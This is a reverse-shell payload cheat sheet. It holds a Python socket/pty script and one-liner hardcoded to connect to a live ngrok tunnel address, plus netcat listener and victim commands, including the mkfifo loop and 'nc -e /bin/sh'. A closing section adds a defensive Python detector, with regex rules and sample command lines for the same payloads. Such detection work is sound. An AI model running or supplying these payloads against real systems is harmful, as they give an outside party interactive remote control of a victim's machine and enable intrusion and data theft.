🧠 Reverse Shell Payloads

What is it?

  • Concept: As the name says, the victim machine connects back to a listener on the attacker's machine and attaches a shell to that connection.
  • Impact: Remote code execution

Payloads

Python

Script:

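import socket,os,pty

# Open an outbound TCP connection to the listener
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('0.tcp.ap.ngrok.io',14771))

# Point stdin (0), stdout (1) and stderr (2) at the socket
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)

# Start bash on a pseudo-terminal so the session is interactive
pty.spawn('/bin/bash')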

Shell one-liner (the same script passed to python3 -c):

python3 -c "import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('0.tcp.ap.ngrok.io',14771));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')" &

Netcat

Attacker machine

netcat -nvlp [port]

Victim machine

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [attacker_IP] [port] >/tmp/f

If the victim has a netcat build that supports the -e flag:

nc -e /bin/sh [attacker_IP] [port]
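
For the defending side, the three payload shapes above can be matched in process command-line telemetry. The following Python is an added example, not part of the original note; the rule names, the event format and the sample command lines (192.0.2.10, listener.example, port 4444) are constructed for illustration.

```python
import re

# Each rule fires only when ALL of its patterns match one command line.
RULES = [
    ("python-socket-pty",          # python -c one-liner: socket + dup2 + pty
     [r"\bpython[0-9.]*\b", r"socket\.socket", r"os\.dup2", r"pty\.spawn"]),
    ("fifo-netcat-shell",          # mkfifo loop: FIFO -> sh -i -> netcat
     [r"\bmkfifo\s+\S+", r"\|\s*(/bin/)?(ba)?sh\s+-i\b",
      r"\|\s*(nc|ncat|netcat)\b"]),
    ("netcat-exec",                # netcat started with -e <shell>
     [r"\b(nc|ncat|netcat)\b.*\s-e\s+\S*/(ba)?sh\b"]),
]

def classify(cmdline):
    """Return the names of all rules that match this command line."""
    return [name for name, pats in RULES
            if all(re.search(p, cmdline) for p in pats)]

def scan(events):
    """Return (pid, [rule names]) for every event that hits a rule."""
    hits = []
    for ev in events:
        names = classify(ev["cmdline"])
        if names:
            hits.append((ev["pid"], names))
    return hits

# Constructed process-creation events (hypothetical format: pid + cmdline).
SAMPLE_EVENTS = [
    {"pid": 101, "cmdline": "python3 -c \"import socket,os,pty;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        "s.connect(('listener.example',4444));os.dup2(s.fileno(),0);"
        "pty.spawn('/bin/bash')\""},
    {"pid": 102, "cmdline": "sh -c \"rm /tmp/f;mkfifo /tmp/f;"
        "cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f\""},
    {"pid": 103, "cmdline": "nc -e /bin/sh 192.0.2.10 4444"},
    {"pid": 104, "cmdline": "python3 -m http.server 8000"},   # benign
    {"pid": 105, "cmdline": "nc -zv 192.0.2.10 443"},         # benign
    {"pid": 106, "cmdline": "mkfifo /tmp/build.pipe"},        # benign
]

if __name__ == "__main__":
    for pid, names in scan(SAMPLE_EVENTS):
        print(pid, ",".join(names))
```

The standalone script form shows only the interpreter and a file name in the process arguments, so it needs a complementary signal such as a shell process whose stdin and stdout are a network socket.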